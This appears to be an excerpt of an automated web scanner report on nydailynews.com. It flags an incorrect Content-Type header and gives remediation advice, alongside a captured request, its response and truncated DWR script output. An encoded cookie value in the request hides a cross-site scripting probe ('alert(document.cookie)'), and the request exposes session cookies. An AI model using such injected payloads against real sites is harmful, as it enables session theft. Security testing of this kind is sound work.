GET /services/apps/ipad/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:24:36 GMT Server: Apache Content-Length: 3765 Content-Type: text/html Content-Language: en Age: 0 Via: AX-CACHE-2.4:20
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Too hot for TV: top banned Super Bowl commercials";s0.url="h ...[SNIP]...
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;